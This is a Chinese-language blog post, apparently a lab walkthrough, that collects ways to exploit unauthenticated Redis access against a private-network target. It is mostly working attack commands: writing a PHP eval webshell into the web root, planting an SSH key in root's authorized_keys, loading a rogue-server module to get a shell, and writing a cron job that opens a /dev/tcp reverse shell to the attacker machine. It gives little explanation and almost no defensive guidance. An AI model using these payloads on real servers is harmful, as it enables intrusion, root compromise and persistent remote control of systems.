一、基本信息

靶机：IP:192.168.100.40

攻击机：IP:192.168.100.60

二、漏洞 & 过程

Redis 未授权访问漏洞利用无口令远程登录靶机

靶机

	cd redis-4.0.8/src
	./redis-server ../redis.conf

   

攻击机

./redis-cli -h 192.168.100.40

   

Redis 未授权访问漏洞利用持久化写入一句话木马

攻击机写下如下 redis 命令

	config set dir /var/www/html
	config set dbfilename test.php
	set webshell "\r\n\r\n<?php @eval($_POST['passwd']); ?>\r\n\r\n"
	save

   

蚁剑连接

Redis 未授权访问漏洞利用公私钥认证获取 root 权限

攻击机 & 靶机

ssh-keygen -t rsa

   

攻击机

	(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt
	cat 1.txt | /root/redis-4.0.8/src/redis-cli -h 192.168.100.40 -x set crack

   

	config set dir /root/.ssh
	config set dbfilename authorized_keys
	save

   

远程连接

ssh -i id_rsa root@192.168.100.40

   

Redis 未授权访问漏洞利用攻击软件获得 shell

攻击机

	cd /root/redis-4.0.8/src
	./redis-cli -h 192.168.100.40
	slaveof 192.168.100.60 6379
	info replication

   

	unzip redis-rogue-server-master.zip
	cd redis-rogue-server-master/RedisModulesSDK/exp
	make

   

python3 /root/redis-rogue-server-master/redis-rogue-server.py --rhost 192.168.100.40 --lhost 192.168.100.60 --exp exp.so

   

未授权访问漏洞利用持久化写计划任务来反弹一个 shell 权限

攻击机监听端口

nc -lvvp 8888

   

设置 shell 反弹

	cd /root/redis-4.0.8/src
	./redis-cli -h 192.168.100.40
	set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.100.60/8888 0>&1\n\n"
	config set dir /var/spool/cron/
	config set dbfilename root
	save

   

反弹成功

作 者：PeiyuJue
链 接： Redis未授权访问漏洞利用合集 – Candid Chronicles
来 源：Aaron的博客
版 权 声 明：本博客所有文章除特别声明外，均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有，未经允许请勿转载！